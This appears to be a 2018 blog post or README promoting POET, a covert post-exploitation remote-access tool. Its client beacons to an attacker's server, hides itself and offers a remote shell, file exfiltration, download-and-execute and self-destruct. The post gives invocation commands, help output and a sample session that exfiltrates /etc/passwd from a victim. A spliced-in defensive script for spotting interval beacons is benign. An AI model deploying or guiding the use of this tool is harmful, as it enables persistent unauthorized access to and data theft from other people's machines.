
POET – A Simple Post-Exploitation Tool

January 28, 2018

POET is a simple post-exploitation tool for gaining a remote shell on a target machine.

The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn’t running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running, however, the attacker gets a control shell to control the client and perform various actions on the target, including:
  • reconnaissance
  • remote shell
  • file exfiltration
  • download and execute
  • self-destruct


Example:

In this scenario, an attacker has gained access to the victim’s machine and downloaded and executed the client. She does not have the server running at this point, but that is fine: the client waits patiently. Eventually, the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then she exits and detaches from the client, which continues running on the target, waiting for the next opportunity to connect to the server. Later, she connects again and self-destructs the client, removing all traces from the target.

Victim’s Machine (5.4.3.2):

$ ./poet-client 1.2.3.4 10  # poet-client daemonizes, so there's nothing to see

Warning: After running this command, you’ll need to either run selfdestruct from the server, or kill the poet-client process to stop the client.

Attacker’s Machine (1.2.3.4):

$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:58:42) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:58:42) Poet server started (port 443)
[+] (06/28/15 03:58:50) Connected By: ('127.0.0.1', 54494) -> VALID
[+] (06/28/15 03:58:50) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
posh > shell
posh > [email protected] $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
posh > [email protected] $ ^D
posh > exfil /etc/passwd
posh : exfil written to archive/20150628/exfil/passwd-201506285917.txt
posh > ^D
[+] (06/28/15 03:59:18) Exiting control shell
[-] (06/28/15 03:59:18) Poet server terminated
$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:59:26) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:59:26) Poet server started (port 443)
[+] (06/28/15 03:59:28) Connected By: ('127.0.0.1', 54542) -> VALID
[+] (06/28/15 03:59:28) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > selfdestruct
[!] WARNING: You are about to permanently remove the client from the target.
    You will immediately lose access to the target. Continue? (y/n) y
[+] (06/28/15 03:59:33) Exiting control shell
[-] (06/28/15 03:59:33) Poet server terminated

Usage:

Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily test it out, a typical invocation would look like:

Terminal 1:

$ ./poet-client 127.0.0.1 1 --debug --no-selfdestruct

By default, the Poet client daemonizes and deletes itself from disk, so that behavior is suppressed using the --debug and --no-selfdestruct flags.

Terminal 2:

$ sudo ./poet-server

By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).

Client:

$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct]
                   IP [INTERVAL]

positional arguments:
  IP                    Poet Server
  INTERVAL              Beacon Interval, in seconds. Default: 600

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  --debug               show debug messages. implies --no-daemon
  --no-daemon           don't daemonize
  --no-selfdestruct     don't selfdestruct

Poet is a client/server application. The client is executed on the target and beacons back to the server at a certain time interval. The only required argument is the IP address where the server is or will be running. Following it can optionally be the time interval in seconds of how frequently to beacon back, which defaults to 10 minutes. The port for the client to beacon out on can be specified with the -p flag. All other flags would not be used during “real” usage and exist mainly for debugging.
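From the defender's side, the fixed beacon interval and the silent retries while the server is offline leave a recognizable pattern in connection logs. The following is an added example, not part of POET or the original post: it flags source/destination pairs whose connections are evenly spaced and mostly refused. The flow records are constructed, the state labels follow Zeek's conn_state style (REJ, SF), and the function name and thresholds are assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: (epoch_seconds, src_ip, dst_ip, dst_port, state).
# "REJ" = connection refused (no listener), "SF" = completed session.
SAMPLE_FLOWS = [
    (t, "10.0.0.5", "192.0.2.10", 443, "REJ") for t in range(0, 6000, 600)
] + [
    (6000, "10.0.0.5", "192.0.2.10", 443, "SF"),   # listener briefly online
    (6601, "10.0.0.5", "192.0.2.10", 443, "REJ"),
    # Ordinary browsing from another host: irregular gaps, all successful.
    (30, "10.0.0.7", "198.51.100.20", 443, "SF"),
    (95, "10.0.0.7", "198.51.100.20", 443, "SF"),
    (1400, "10.0.0.7", "198.51.100.20", 443, "SF"),
    (1420, "10.0.0.7", "198.51.100.20", 443, "SF"),
    (5200, "10.0.0.7", "198.51.100.20", 443, "SF"),
    (5900, "10.0.0.7", "198.51.100.20", 443, "SF"),
]


def find_beacons(flows, min_events=6, max_jitter=0.1, min_refused=0.5):
    """Return findings for (src, dst, port) tuples that look like interval beacons.

    Thresholds are assumptions to tune per environment: at least min_events
    connections, coefficient of variation of the gaps <= max_jitter, and at
    least min_refused of the attempts refused (listener mostly offline).
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port, state in flows:
        by_pair[(src, dst, port)].append((ts, state))

    findings = []
    for key, events in sorted(by_pair.items()):
        if len(events) < min_events:
            continue
        events.sort()
        times = [ts for ts, _ in events]
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Spread of the gaps relative to their mean; near 0 means clockwork timing.
        jitter = pstdev(gaps) / avg if avg else float("inf")
        refused = sum(1 for _, s in events if s == "REJ") / len(events)
        if jitter <= max_jitter and refused >= min_refused:
            findings.append({"pair": key, "interval": round(avg),
                             "jitter": round(jitter, 3),
                             "refused": round(refused, 2)})
    return findings
```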

Server:

$ ./poet-server -h
usage: poet-server [-h] [-p PORT] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --version         prints the Poet version number and exits
